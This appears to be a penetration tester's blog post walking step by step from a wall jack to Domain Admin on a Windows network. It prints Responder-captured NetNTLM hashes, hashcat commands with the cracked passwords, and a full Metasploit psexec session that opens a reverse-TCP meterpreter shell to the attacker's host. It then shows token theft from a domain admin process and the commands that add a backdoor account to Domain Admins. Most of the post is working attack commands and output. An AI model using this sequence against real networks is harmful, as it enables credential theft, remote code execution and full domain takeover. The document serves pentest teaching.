In every Network PT, my goal is Domain Admin account.
Every time get ethernet wall jack inside some organization, and start testing it without any prior knowledge about internal network topology, IP addresses etc.
First of all, because of no knowledge if there is some implementation of NAC (Network Access Control), i perform a passive information gathering about the network, IP addresses etc.
Configure your network-manager, that it will not request IP address from DHCP Server, to be quiet as possible.
So I start listening to traffic with wireshark and go out to take a cigarette :)
Almost every computer talks. Broadcasting...
Even on small network, many many packets pass in.
REMEMBER, Do not query DHCP Server for an IP Address!
In first step there's only passive scanning. Fully promiscuous... :)
When I come back from a smoke break, i've already got a list of stations broadcasting and exposing itselves.
Wireshark > Statistics > Endpoint List > IPv4
In terminal:
# nano a Ctrl+Shift+V (paste) Ctrl+X y # cat a | grep -Eo '[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}' > hosts.txt
Let's assume that there is no NAC implemented (will talk about NAC Bypass in another post...)
Now we have full network access including small list of active hosts.
As always, i will have a windows based network, with Active Directory services and lot of workstations.
What to do?
Quick win: LLMNR & Netbios poisoning. Responder.
As i understood from dozens network penetration testings, organizations have two major weaknesses:
1. Weak password policy.
2. Domain User == Local Administrator on his/her workstation.
Responder will throw you large amount of NetNTLMv1/v2 hashes, that probably will be easy to crack.
/* Responder is very cool tool, that will answer to every LLMNR broadcast query, asking for downgrade to NETBIOS, and then request a hashed password.
It's based on human factor (typos), outdated scripts, laptops that making use of multiple networks, etc... */
Download and try it now :) it has many other features. Explore it in your free time.
You will get hashes like these:
10.10.5.11/ntlmv2 johny::TESTDOMAIN:1122334455667788:37F142C48CDDAF40D03994F2F7D9268A:0101000000000000744DA7A6851FD101C0A9A16609D468450000000002000A0073006D006200310032000100140053004500520056004500520032003000300038000400160073006D006200310032002E006C006F00630061006C0003002C0053004500520056004500520032003000300038002E0073006D006200310032002E006C006F00630061006C000500160073006D006200310032002E006C006F00630061006C0008003000300000000000000000000000003000001E52327CBAC7A0B551681A69D12FB2FEB6B6A0A623A978B286F031417EBFF8EF0A001000000000000000000000000000000000000900180063006900660073002F0053004900560052004F004E0031000000000000000000 10.10.5.229 michaelm::TESTDOMAIN:8F2D7E1914726F4600000000000000000000000000000000:C1703E5FC4241BDA1A2DDAF407575CF841AA97DF7B35720C:1122334455667788 10.10.5.45 billa::TESTDOMAIN:7DDDE7E2E16F906200000000000000000000000000000000:E9752EDD65C026A35108E52DAF408D17BF1348D70F3FCFA5:1122334455667788 10.10.5.175 elia::TESTDOMAIN:0B855CAC8F5D80AC00000000000000000000000000000000:C46289A8CE6ACEB37800F520943F7AA7DAF40289C3415636:1122334455667788 10.10.5.214 ilaib::TESTDOMAIN:6BA8A02F2F282DF200000000000000000000000000000000:8A7B2C2102323B363B0A6E7E3AE34018C06DAF40668B9000:1122334455667788 10.10.5.155 willk::TESTDOMAIN:EFA76E90191CE98700000000000000000000000000000000:D45E3A60B96D448D638DA9EA80171A78916A21DAF40B16CA:1122334455667788 10.10.5.6 maias::TESTDOMAIN:C57273ACF1084CCD00000000000000000000000000000000:785231FECE6A7BDAF40B21153D421DFB0C62E0095C96C311:1122334455667788 10.10.5.170 rachelp::TESTDOMAIN:AA736CB48DE1930800000000000000000000000000000000:619FF7277C2015CEADAF40D7A723D531E267A4DA07D62F79:1122334455667788 10.10.5.212 roberts::TESTDOMAIN:A1362DE2AFC18DAD00000000000000000000000000000000:60F60FB8ACDADEF7BDB5ED65751FFDAF4020280E02614360:1122334455667788
NetNTLM hashes can be cracked with many tools, i prefer: John-the-ripper / cudaHashcat / oclHashcat
In our first case, we successfully cracked some hash:
# cudaHashcat -m 5500 -a 0 responder_hashes.txt wordlist.txt
# hashcat -m 5500 responder.txt --show cudaHashcat v2.01 starting... johny::TESTDOMAIN:8F2D7E1914726F4600000000000000000000000000000000:C1703E5FC4241BDA1ADEADBE77575CF841AA97DF7B35720C:1122334455667788:Qwerty123 billa::TESTDOMAIN:6BA8A02F2F282DF200000000000000000000000000000000:8A7B2C2102323DEADBEA6E7E3AE34018C06AE2F8668B9000:1122334455667788:Ma123456 michaelm::TESTDOMAIN:C57273ACF1084CCD00000000000000000000000000000000:785231FECE6A7BC8A33B21153D4DEADBEC62E0095C96C311:1122334455667788:Bi010203
I like metasploit.
# msfconsole msf > use exploit/windows/smb/psexec msf exploit(psexec) > set smbdomain testdomain msf exploit(psexec) > set smbuser johny msf exploit(psexec) > set smbpass Qwerty123 msf exploit(psexec) > set rhost 10.10.5.11 msf exploit(psexec) > set payload windows/meterpreter/reverse_tcp_rc4 msf exploit(psexec) > set rc4password supersecret msf exploit(psexec) > set LHOST <TAB><TAB> msf exploit(psexec) > set lport 443 msf exploit(psexec) > run [*] Started reverse TCP handler on 10.10.5.91:443 [*] Connecting to the server... [*] Authenticating to 10.10.5.11:445 as user 'johny'... [*] Selecting PowerShell target [*] 10.10.5.11:445 - Executing the payload... [+] 10.10.5.11:445 - Service start timed out, OK if running a command or non-service executable... [*] Sending stage (957491 bytes) to 10.10.5.11 [*] Meterpreter session 1 opened (10.10.5.91:443 -> 10.10.5.11:56019) at 2016-01-13 02:51:30 +0200 meterpreter > getuid Server username: NT AUTHORITY\SYSTEMNow we've got a workstation in this organization.
Quick win #1 Pass the token (the simple way):
meterpreter > ps
Process List ============ PID PPID Name Arch Session User Path --- ---- ---- ---- ------- ---- ---- 0 0 [System Process] 4 0 System x64 0 192 904 csrss.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\csrss.exe 544 836 winlogon.exe x64 1 NT AUTHORITY\SYSTEM C:\Windows\System32\winlogon.exe 556 848 lsass.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\lsass.exe 716 4 smss.exe x64 0 NT AUTHORITY\SYSTEM C:\Program Files (x86)\NVIDIA Corporation\3D Vision\nvSCPAPISvr.exe 1224 7016 schedhlp.exe x86 2 testdomain\domadmin C:\Program Files (x86)\Common Files\Acronis\Schedule2\schedhlp.exe 1232 920 svchost.exe x64 0 NT AUTHORITY\NETWORK SERVICE C:\Windows\System32\svchost.exe 1336 920 svchost.exe x64 0 NT AUTHORITY\LOCAL SERVICE C:\Windows\System32\svchost.exe 1520 920 schedul2.exe x64 0 NT AUTHORITY\SYSTEM C:\Program Files (x86)\Common Files\Acronis\Schedule2\schedul2.exe 1672 920 svchost.exe x64 0 NT AUTHORITY\NETWORK SERVICE C:\Windows\System32\svchost.exe 1760 920 afcdpsrv.exe x86 0 NT AUTHORITY\SYSTEM c:\Program Files (x86)\Common Files\Acronis\CDP\afcdpsrv.exe 1924 920 spoolsv.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\spoolsv.exe 1988 920 svchost.exe x64 0 NT AUTHORITY\LOCAL SERVICE C:\Windows\System32\svchost.exe 2104 920 AppleMobileDeviceService.exe x64 0 NT AUTHORITY\SYSTEM C:\Program Files\Common Files\Apple\Mobile Device Support\AppleMobileDeviceService.exe 2436 920 LMS.exe x86 0 NT AUTHORITY\SYSTEM C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\LMS\LMS.exe 2464 920 xrksmdb.exe x64 0 NT AUTHORITY\SYSTEM C:\Program Files (x86)\Xerox Office Printing\WorkCentre SSW\PrintingScout\xrksmdb.exe 2496 2808 RAVCpl64.exe x64 1 testdomain\johny C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe 2500 920 iPodService.exe x64 0 NT AUTHORITY\SYSTEM C:\Program Files\iPod\bin\iPodService.exe 2524 1336 audiodg.exe x64 0 NT AUTHORITY\LOCAL SERVICE C:\Windows\System32\audiodg.exe 2808 2768 explorer.exe x64 1 testdomain\johny C:\Windows\explorer.exe 2872 7016 egui.exe x64 2 testdomain\domadmin C:\Program Files\ESET\ESET NOD32 Antivirus\egui.exe 2908 2744 Paragon ExtFS for Windows.exe x86 1 testdomain\johny C:\Program Files (x86)\Paragon Software\Paragon ExtFS for Windows\Paragon ExtFS for Windows.exe 2936 2808 ipoint.exe x64 1 testdomain\johny C:\Program Files\Microsoft IntelliPoint\ipoint.exe snip..Stealing testdomain\domadmin token:
meterpreter > migrate 2872 [*] Migrating from 12104 to 2872... [*] Migration completed successfully. meterpreter > shell c:\whoami testdomain\domadmin c:\net user domadmin /domain The request will be processed at a domain controller for domain testdomain.local User name domadmin Full name Comment ..snip.. Global Group memberships *Domain Admins *Domain Users ..snip.. The command completed successfully. c:\net user support myPass123 /add /domain The request will be processed at a domain controller for domain testdomain.local The command completed successfully. c:\net localgroup administrators support /add /domain The request will be processed at a domain controller for domain testdomain.local The command completed successfully. c:\net group "Domain Admins" support /add /domain The request will be processed at a domain controller for domain testdomain.local The command completed successfully.Game over.
Next post will be another examples gaining domain admin account.
See you!